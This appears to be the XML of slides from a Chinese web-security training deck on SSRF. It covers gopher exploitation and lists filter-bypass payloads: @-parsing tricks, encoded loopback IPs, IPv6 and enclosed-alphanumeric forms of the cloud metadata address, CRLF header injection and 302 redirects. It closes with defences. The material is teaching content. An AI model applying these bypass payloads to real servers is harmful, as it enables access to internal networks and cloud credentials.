            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>处理器发出去。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sftp:// SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件传输协议或安全文件传输协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ldap:// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>轻量级目录访问协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>tftp:// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>简单文件传输协议</a:t>
            </a:r>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8880" y="584200"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>gopher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>协议利用原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2222500" y="1205865"/>
            <a:ext cx="7230110" cy="5124450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4679950" y="630555"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如何利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>AI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>学习</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671955" y="631190"/>
            <a:ext cx="8056245" cy="58674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714500" y="473075"/>
            <a:ext cx="8763000" cy="59118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904365" y="227965"/>
            <a:ext cx="7195185" cy="64027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9360" y="243840"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>绕过技巧</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1229360" y="914400"/>
            <a:ext cx="9909175" cy="5754370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>、限制为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>http://www.xxx.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>域名时（利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>可以尝试采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>基本身份认证的方式绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>http://www.aaa.com@www.bbb.com@www.ccc.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>，在对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>解析域名中，不同的处理函数存在处理差异</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>parse_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>中会识别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>www.ccc.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>libcurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>则识别为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>www.bbb.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>采用短网址绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>比如百度短地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>https://dwz.cn/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>采用进制转换</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>八进制：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>0177.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>。十六进制：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>0x7f.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>。十进制：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>2130706433.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>利用特殊域名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>原理是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>解析。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>xip.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>可以指向任意域名，即</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>127.0.0.1.xip.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>，可解析为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>(xip.io </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>现在好像用不了了，可以找找其他的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>[::]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>[::]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>来绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>http://169.254.169.254&gt;&gt;http://[::169.254.169.254]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>利用句号</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>127</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>1 &gt;&gt;&gt; 127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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68675" y="2803525"/>
            <a:ext cx="5435600" cy="752475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基础第二次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>培训</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9515" y="521970"/>
            <a:ext cx="9812655" cy="5077460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CRLF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%0d-&gt;0x0d-&gt;\r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>回车</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%0a-&gt;0x0a-&gt;\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>换行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头部注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>example.com/?url=http://eval.com%0d%0aHOST:fuzz.com%0d%0a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>8.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用封闭的字母数字</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Enclosed alphanumerics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>ⓔⓧⓐⓜⓟⓛⓔ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>ⓒⓞⓜ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> &gt;&gt;&gt; example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://169.254.169.254&gt;&gt;&gt;http://[::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>①⑥⑨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>｡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>②⑤④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>｡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>⑯⑨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>｡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>②⑤④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>List:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>ⓛⓞⓒⓐⓛⓗⓞⓢⓣ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>⓵⓶⓻</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>⑦</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>⓪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>⓪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>①</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>9.302</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>跳转</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>先让靶机访问自己服务器上的一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>302</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>重定向，从而请求恶意地址。可以用这种方法来绕过限制请求只为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的。</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36345" y="473075"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>防御</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889635" y="1424940"/>
            <a:ext cx="10764520" cy="4742815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、过滤返回信息，验证远程服务器对请求的响应是比较容易的方法。如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、统一错误信息，避免用户可以根据错误信息来判断远端服务器的端口状态。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、限制请求的端口为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常用的端口，比如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>80,443,8080,8090</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、黑名单内网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。避免应用被用来获取获取内网数据，攻击内网。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
